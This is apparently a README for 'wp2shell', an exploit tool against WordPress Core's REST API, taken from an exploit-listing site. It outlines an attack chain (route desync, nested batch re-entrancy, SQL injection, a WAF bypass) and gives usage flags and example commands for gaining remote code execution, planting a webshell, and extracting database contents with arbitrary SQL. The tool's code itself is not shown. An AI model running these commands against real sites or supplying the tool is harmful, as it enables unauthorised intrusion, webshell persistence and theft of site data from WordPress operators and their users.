Share
## https://sploitus.com/exploit?id=B01CB10B-AEB0-5763-B1D9-807C0D261127
# wp2shell
Pre-authentication RCE exploit for WordPress Core REST API (CVE-2026-63030 | CVSS 9.8).
```
____ _ _ _
__ ___ __ |___ \ ___| |__ ___| | |
\ \ /\ / / '_ \ __) / __| '_ \ / _ \ | |
\ V V /| |_) |/ __/\__ \ | | | __/ | |
\_/\_/ | .__/|_____|___/_| |_|\___|_|_|
|_| CVE-2026-63030
```
## Overview
HTTP/HTTPS wp2shell PoC with advanced capabilities for impact demonstration on improperly configured WordPress sites.
**Affected versions:** WordPress Core 6.9.0 - 6.9.4, 7.0.0 - 7.0.1
**Exploit chain:**
1. Batch-route desync via `$validation`/`$matches` index misalignment
2. Re-entrancy through nested batch dispatch (no `is_dispatching()` guard)
3. SQL injection via unsanitized `author__not_in` string bypass in `WP_Query`
4. Optional CloudFront WAF bypass using `GET + _method=POST` with PHP array params
## Usage
```
python wp2shell.py [options]
```
### Modes
| Flag | Description |
|------|-------------|
| `--check` | Non-destructive vulnerability probe only |
| `--exploit` | Full pre-auth RCE chain |
| `--shell` | Deploy shell with known admin creds |
| `--cleanup` | Remove deployed webshell |
| `--extract SQL` | Extract data via blind SQLi |
### Options
| Flag | Description | Default |
|------|-------------|---------|
| `--proxy PROXY` | HTTP proxy (e.g. `http://127.0.0.1:8080`) | None |
| `--timeout TIMEOUT` | HTTP timeout in seconds | `30` |
| `--table-prefix PREFIX` | WordPress table prefix | `wp_` |
| `--webroot PATH` | Server webroot for OUTFILE | `/var/www/html` |
| `--shell-key KEY` | Webshell auth key | Random |
| `--admin-user USER` | Admin username (for `--shell`/`--cleanup`) | None |
| `--admin-pass PASS` | Admin password (for `--shell`/`--cleanup`) | None |
| `--skip-outfile` | Skip SELECT INTO OUTFILE attempt | Off |
| `--sleep DURATION` | SLEEP duration for blind SQLi | `0.15` |
| `-v, --verbose` | Verbose output | Off |
## Examples
```bash
# Check if target is vulnerable (non-destructive)
python wp2shell.py https://target.com --check
# Full exploit chain
python wp2shell.py https://target.com --exploit -v
# Extract arbitrary data via blind SQLi
python wp2shell.py https://target.com --extract "SELECT user_login FROM wp_users LIMIT 1"
# Deploy shell with known creds
python wp2shell.py https://target.com --shell --admin-user admin --admin-pass password123
# Cleanup
python wp2shell.py https://target.com --cleanup --admin-user admin --admin-pass password123 --shell-key
```
## Requirements
- Python 3.8+
- `requests`
```bash
pip install requests
```